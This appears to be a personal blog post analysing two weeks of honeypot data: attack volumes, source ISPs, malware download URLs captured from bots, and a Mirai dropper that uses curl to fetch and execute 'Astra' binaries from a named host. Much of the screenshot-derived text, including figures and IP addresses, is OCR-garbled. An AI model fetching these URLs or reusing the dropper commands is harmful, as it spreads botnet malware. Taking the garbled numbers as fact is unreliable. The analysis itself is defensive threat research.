Kategorien
Cybersecurity

Analyzing Honeypot Data after 2 Weeks

Two weeks ago I started a little experiment and set up the T-Pot honeypot collection on an AWS EC2 instance. This article describes what I’ve learned out analysing the collected data.

So much Noise

995,173 attacks against my server after 14 days! – There is a lot of background noise caused by fully automated attacks. So the chance is high that a real attack is overlooked.

type.keyw«d: Descendhg 
Heralding 
Dionaea 
Honeytrap 
Rd py 
Ad bhoney 
Ciscoasa 
Mailoney 
Elasticpot 
Dicompot 
Honeysap 
667,222 
200677 
71,905 
6006 
109 
15 
994,930 
Count 
2017% 
7227% 
0.604% 
0.14% 
0035% 
0031% 
0012% 
0011% 
0002%

As a defender you need to find proper ways to filter out all this noise, to a achieve a clean baseline and catch the real attackers.

It’s almost impossible to locate the attackers

The attacks are coming from all over the world. Therefore, you should be careful with statements about which country is responsible for the most hacking attacks. But it seems like Ireland is used as some kind of gateway for automated or bot based hacking.

geoip -cou rtry_name.keyword: 
Descending 
Ireland 
Descendng 
ætersburg Network ltd. 
Count 
936470 
Count 
56.229%

56 percentage of all attacks are coming from Ireland, through „Petersburg Internet Network ltd.“, a russian based ISP. [https://pinspb.ru/]

These are the top 10 attacking IPs, which use this ISP.

Attack« %urce IP 
50uK0 IP 
5 , 188-8 1b8 
5 , 18 85 , 21 9 
5 , 1B8.8 57 
5.18 8 1b5 
5.18 8 21 6 
5.18 & 8 167 
5.18 & 85.1B0 
5.18 & 8 21 2 
5.18 & 87 一 53 
5.18 852 〕 6 
- Top 10 
31 , 540 
31 , 298 
31 061 
757 
6 昍 
, 921 
, 291

A quick check on https://www.ip2proxy.com/5.8.18.90#proxyresult shows that this IPs belong to a large VPN – owned by Petersburg Internet Network.

Proxy Detection Result 
IP Address 
Proxy Type 
Country Code 
Country Name 
Region Name 
City Name 
ISP 
Domain 
5.188.86.168 
VPN (click nere tor details) 
NL 
Netherlands 
Noord-Holland 
Amsterdam 
Petersburg Internet Network Ltd. 
pinspb.ru

These are the most frequently used network providers that are used for bot based hacking.

geoip.courtry_name.keyword: 
Descending 
Ireland 
United States 
Vietnam 
Netherlands 
Venezuela 
United States 
Descendng 
Petersburg Interret Network ltd. 
Digital Ocean, 
Viettel Corporation 
Onlirr S.as 
CAN TV Servicios, Venezuela 
Massæhusetts Institute of T&hnology 
Count 
936470 
129,957 
48050 
42.366 
42.350 
42,301 
Count X•rcentages 
56229% 
7803% 
2.885% 
2.544% 
2.543%

Only a small percentage of the attackers are using the TOR network.

Cowrie - Attacker Src IP Reputation 
known attacker 
bad reputation 
tor exit node 
mass scanner 
bot, crawler

So if you want to be noticed as an attacker, you should use TOR. If you want to remain undetected, you should use popular VPN and proxy providers to disappear in the crowd.

Suspicious File Downloads

After the attack bots got access to my honeypot, some of them tried to download additional tools and scripts.

src_ip.keyword: 
212.129.29208 
212.12929208 
212.129.29208 
134.209.7696 
142.93.1.103 
3487.18089 
185.146.2Q.28 
185.146.2Q.28 
159.203.18.156 
urLkeyword: Decending 
ftg//anonymousanonymous@178.159.36.245/update 1 sh 
http•J/45.153203137/shema1eloverbirwh 
http•J/4624932194.'bins/Bye8yex86 
http•J/46.249.32194.'bins/Bye8yex86 
http•J/11Y147213.57/botpl 
http•J/185.239242.62/Pemexsh 
fw//anonymousanonymous@185239.242.62/Pemex1sh 
htw.//185.243215254/yoyobins.sh

Attack bot with IP 212.129.29.208, used a deticated server located in France and downloaded a script from 178.159.36.245, a server located in Russia.

e 178.159.36.245 
Country 
Organization 
Last Update 
ASN 
View Raw Data 
Private Internet Hosting LTD 
Private Internet Hosting LTD 
AS213058

The same attacker downloaded another script from 45.153.203.137. A windows computer based in Netherlands.

045.153.203.137 
selt-siy,ned 
City 
Country 
Organization 
Last Update 
ASN 
View Raw Data 
Brielle 
Netherlands 
DediPath 
DediPath 
AS213035

34.87.180.89 (a Google Cloud instance) downloads a DDoS bot written in Perl (check this article for further analysis of this script https://www.programmersought.com/article/29824452895/) from a computer located in China.

e 119.147.213.57 
City 
Country 
Organization 
Last Update 
ASN 
View Raw Data 
Shenzhen 
China 
China Telecom (Group) 
China Telecom 
AS4816

All in all it is always the same pattern. Attackers use VPN, proxy or cloud providers to launch automated attacks. In case of success they download further tools and scripts from previously hacked machines. In most cases this is malware that tries to spread further.

I think it’s possible to generate a list of hosts that are used as command and control servers over time. These could be missused by bad minded people for there own hacking attempts. So if you are looking for some jump points, running a honeypot could be a way…

Mirai

The honeypot also catched a mirai worm, which is known for building bot nets that could be used for DDOS attacks.

src_ip.keyword: DesceMing 
34.12347248 
url.keyworå Descending 
http•U119.14721357,'tntpl

Let’s have a look into the downloaded shell script.

cd 、 
cd 、 t cd 、 ; r 、 r 亖 
cd 、 t /var/run 
cd > cd /var/run 
一 、 t cd /var/run 
> cd > 、 r 豸 
cd > cd ; r 、 r 亖 
一 、 t cd /var/run 
cd > cd /var/run 
cd 、 t cd 、 ; r 、 r 亖 
cd > > 、 r 
12/bin 、 
File Edit View Terminal Ta H 凹 
cd /var/run 
cd 1 
cd /nnt 
cd 」 It 
cd /mnt cd [root 
cd 」 It 
cd 、 」 
cd /mnt 、 root 
cd ; 
cd /nnt 
一 t 
一 、 root 
cd 、 root 
cd 、 root 
cd 、 r00 
cd 、 root 
一 、 root 
cd 、 root 
cd 、 root 
cd 、 root 
/bins/Astra; curl 10 http.•// 
7b1n57A5tr3 一 curl | 0 http: 、 、 
0/bins/Astra; curl 丨 0 http:// 
/bins/Astra; 2r1 , 0 http … 、 、 
/bins/Astra; curl , 0 http:// 
、 bins 、 As ra 一 curl , 0 http:// 
/bins/Astra; curl , 0 http … 、 、 
、 bins 、 A ra 一 2r1 , 0 http:// 
/bins/Astra; curl , 0 http: 丶 、 
/bins/Astra; 2r1 , 0 http … 、 、 
、 bins 、 Ast ; … curl | 0 http … 、 
一 /bins/Astra;cat Astra >rootz;chnod * 一 , 、 r00t2 R00t5 
Astra 》 r00t2 ;chrn•:)d 一 , 、 r00 、 eday 
/bins/Astra.; cat Astra root 、 … Ch 乛 *X … , 、 root ~ 
/bins/Astra;cat Astra ) r00t7 ; 一 Od •x : 、 r00t7 eday 
/bins/AStra;cat Astra >rOOtZ *X 一 , 、 r00t2 øday 
、 bins 、 As ra ; at As ra 》 r00t2 ;chnod •x : 、 root 、 øday 
/bins/Astra;cat Astra >rootz;chrrod *x *;. /rootz eday 
/bins/Astra;cat Astra >rOOtz *X 一 , 、 r00t2 øday 
/bins/Astra;cat Astra 》 r00t7 ; bod •x : 、 r00t7 eday 
/bins/Astra;cat Astra >rootz;chmod * 一 , 、 root øday 
/bins/Astra;cat Astra 》 root 、 ; bod •x : 、 r00t7 eday

What is behind 45.153.203.129?

According to Shodan it is a computer located in the Netherlands that  offers HTTP and SMB.

e 45.153.203.129 
City 
Country 
Organization 
Last Update 
ASN 
View Raw Data 
Brielle 
Netherlands 
Dedipath 
DediPath 
AS213035

It’s possible to connect via ftp to this machine.

The /bins/ folder contains some binaries.

45.153.203_129'binsf 
Index of /bins 
Name 
Parent Directorv 
Astra .arm5 
Astra. arm6 
Astra. arm7 
Astra.m68k 
Astra. mips 
Astra.mpsl 
t AStra.sh4 
Astra.spc 
Astra.x32 
t 
Astra-x86 
Last modified 
14-Nov-2020 03:15 
14.Nov.2020 03:15 
14-Nov-2020 03:15 
14-Nov-2020 03:15 
14-Nov-2020 03:15140K 
14-Nov-2020 03:15 
68K 
14-Nov-2020 03:15 
86K 
14-Nov-2020 03:15 
88K 
14-Nov-2020 03:15 
65K 
14-Nov-2020 03:15 
62K 
14-Nov-2020 03:15 
69K 
14-Nov-2020 03:15 
69K 
14-Nov-2020 03:15 
62K 
Size Description 
65K 
67K 
59K 
78K 
Apache/2.2.15 (Centos) Server at 45.153.203.129 port 80

And according to virustotal.com this is the mirai worm.

https:f!wv.•vv.virustotal.com/qui/fiLc/27834Sd304af27ecd4eOdc2dcObca88d046d36da3cOd1c55ff7409832257a9bbfdetection 
xa88d046d36da3cOd1cSSff74098322S7a9bb 
31 
DETECTION 
0 31 engines detected this 
278348d304af27ecd4eOde2dcObca88d046d36da3cOd1cSSff74098322S7a9bb 
61.55 Kg 
2020-11-14 UTC 
day go 
DETAILS 
BEHAVIOR 
Trojan. Linux. M i rai 
Trojan. Linux. 
Q) 
COMMUNITY 
Avast - 
(D 
Trojan. Linux. Mirai_l 
EL [Tri] 
Trojan.Linux.Mirai.I

I suppose this is not the only malware file the honeypot collected. The Dionaea docker container will surly contain more and I will check this later.

Strange Messages on the Wire

The bots send a lot of japanese and chinese gibberish in form of http request to different websites.

dest_ip.køword: Desc:mding 
www.googlecom 
i forgot.applecom 
www.evernote.com 
192.05612 
idmsa.apple.com 
www.yoututp.com 
soundcloudcom 
192.0.57.% 
api.ipifyorg 
deÄ_p0rt: Descnding 
443 
Count 
10,076 
10,064 
4,823 
3,001 
ago 1 
Z601 
Z531
dest_ip 
google . c 
google . c 
google c 
google . c 
google . c 
443 
443 
b'GET HTTP/I MoziIIa/5.e (Macintosh; Intel 
Mac OS X AppleWebKit/537.75.14 (KHTML, like Gecko) version/6.1 .3 
ept-Language: http://google.com\r\n\r\n• 
\xcø, \ xce+\ xcøe xee ' xce xce xee xee xøe= \ xee« \xee 
xel , xee we 1 \ 
4\xel xel xel xe3 xe3 IxBI \ \ xe2 \ \ xfB\ xb9 12 \ xb9 x88G\ xe6D xcc \xb4 \ xf3 \ 
al ; \x9axe 
\ \ V \ yaø\ \ yøf \ 
b ' \ xl 6 \ xel \ xel \xfl xb6\ x86 \ xe8 xd9w\ x915?- \ Ix87\ xc62VF\ xd8{ " \xal 1183 \ xdl xcdC\ xba9\xcc 
xcemxce, \ xcø( \ xces 1 xeek xeeh xee7 x86 
xcø. xce x9d xcex • 13 t xa2 xeeg 
xøe? \xee3 \ xøe2 \xeel \ xeøe\ xee xee x97 xeømxeec xcel xce- Ixce) xce xee xee« \xee,' 
B\x96 xcmx12\ xee \ x16 \ xl 3 xl r \ xcB\ rx Xce \xB3 xee Ixff\ xel xel 5\xee xee IxBf\ xøe r \ ngoogle.com\xB 
b'GET / opera/9.8e (Windows NT 6.1; WOW64) Presto/2.12.388 
b'GET HTTP/I MoziIIa/ 
5.ø (Windows UT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.e.1847.116 gzip\ 
r\nAccept-Language: 3Ømr\nReferer: http://google.com\r\n\r\,n•

We can use Cyberchef to encode this strings.

And Google translate will reveal some strange messages.

! 弳 垧 弳 飞 弳 飞 弳 . 脛 酽 一 . 弳 昷 弳 脛 屢 扌 片 也 恨 擠 层 扌 片 睏 
弳 飞 屢 尷 屦 扌 片 尸 尷 僦 扌 片 塥 硬 蚪 尴 認 眷 尾 八 履 宿 弳 
慣 慣 擄 硬 一 硬 一 尴 揉 + 弳 。 虺 隸 一 弳 。 八 腫 屦 八 腫 履 } 隶 。 
冗 隸 : 弳 。 , 弳 。 氵 是 弳 。 瑜 弳 。 硬 。 硬 ‰ 硬 一 扌 一 挹 弳 一 尽 
八 歟 弳 一 趲 八 己 硬 一 氵 是 陘 脛 一 陘 尬 八 腫 八 腫 八 腫 八 屦 八 腫 冚 八 腫 八 腫 
柿 潯 氵 开 . 瀾 是 八 腫 屮 八 腫 八 尸 八 腫 八 嗟 八 腫 層 八 腫 尷 八 腫 尸 八 腫 
八 屢 八 腫 八 尷 八 就 八 腫 八 腫 山 八 腫 喜 尴 八 腫 喜 尷 八 尴 八 就 八 趲 八 就 八 尷 
八 就 八 尴 八 扈 八 八 扈 八 八 扈 八 八 八 八 就 八 八 八 弳 一 弳 
旦 陘 ℃ 悒 弳 山 厝 片 尹 八 屢 痄 艉 磙 层 屣 屢 隸 屣 } 片 尴 扈 
層 嘴 屋 數 匱 13 点 梘 哲 ‰ L 匚 尸 嚴 屢 揣 9 点 敢 
哲 《 LL 喈 恢 談 一 隸 尹 屣 尹 椴 礦 0 ' 《 秦 
弳 〈 弳 呔 蜊 苤 數 由 一 嫻 i 剄 沙 屉 } 隶 尷 緦 腫 窄 屣 數 俟 屹 扈 
屣 睨 尴 猶 公 攸 弳 i 張 台 。 櫟 尻 扌 片 尷 棣 尹 尹 八 尷 緦 填 履 痄 
尹 尹 睨 扌 片 畢 驸 斗 唆 鉞 弳 9 点 18 点 一 垧 尼 數 娶 弳 據 黽 昼 尷 棣 × 據 
代 剄 点 慰 數 栽 尥 之 屋 八 扈 縻 尸 數 尸 履 屣 尷 最 眸 岃 數 
履 八 尷 數 尸 扌 片 尷 昼 燜 坩 弳 离 尹 弳 龍 皖 飞 弳 概 忄 容 屨 地 數 尹 
黽 屡 埭 匚 弳 外 屹 數 馗 棣 僞 9 点 剄 也 弳 眈 脛 L 匚 陘 女 軌 
屈 扌 片 尴 摸 廾 副 囗 ! 見 履 痄 止 糇 剄 气 陘 萋 层 尸 恿 尷 隸 履 欹 剄 邑 奶 
黽 鞔 也 欺 怎 i 剄 佥 1 ‰ 屋 就 尹 八 腫 尷 八 腫 八 腫 屦 
八 就 八 八 就 八 費 
! 陉 垧 陉 飞 陉 飞 陉 . 砼 酽 砼 . 一 砼 . 昷 砼 飞 屢 扌 片 腫 携 恨 擠 劓 丰 
严 陉 擠 專 严 9 再 闌 爛 巾 闌 爛 巾 闌 爛 巾 闌 憫 巾 闌 陉 鬢 陉 蚪 embarrassing 尾 
八 諑 痄 " ' 平 擄 、 、 、 、 虺 扌 隶 + 陉 。 虺 揉 一 。 脆 八 燦 飲 
煤 。 八 對 。 八 對 。 燦 煤 燦 煤 。 胫 。 氵 圣 。 瑜 陉 。 砼 陉 。 砼 
‰ 陉 一 陉 掮 陉 一 陉 挹 陉 一 尽 八 歟 陉 趲 籠 範 籠 範 
籠 八 AWaA 陉 噸 repeate 引 y 尷 数 from 一 沙 陉 
棣 腫 腫 窄 屣 数 亻 矣 立 阉 屣 氲 圹 陉 揿 揿 圹 
心鍪心圣} 沙 心圣容对 隶 》杰£訕杰縻 屣 numberYinyinyinynynyinylnynyyyy 
Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y S Y 
s s s Number Of dead bodies If you have repeatedly set it up, you will 
be able to use it for a while 、 The number Of times will be repeated. 
The number Of times will changed. The corpse is embarrassed, 
and the corpse is embarrassed, and the corpse is embarrassing.
SPRACHE ERKENNEN 
JAPANISCH 
CHINESISCH 
DEUTSCH 
DEUTSCH 
CHINESISCH (VEREINFACHT) 
ENGLISCH 
. A If you are not in a position to do so, you can repeat it repeatedly, 
and then you will be able to do it again and again, you will be able to 
do it again and again, and that will be the case. Sing

The translation heavily depends on the symbols we remove from the orginal string. This feels a bit scary, so I personally don’t want to know what that actually means.

The same gibberish is send out on different ports like port 25. I think this could be some kind of DDoS against a list of targets, but I’m not sure.

SSH Input

The Cowrie honeypot also collected some SSH sessions and their input.

However, since most of this comes from bots, I will not investigate this data further for now. In the event of a real attack, however, this information can be very helpful.

Handy Tools

These tools have been very useful for further investigation:

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.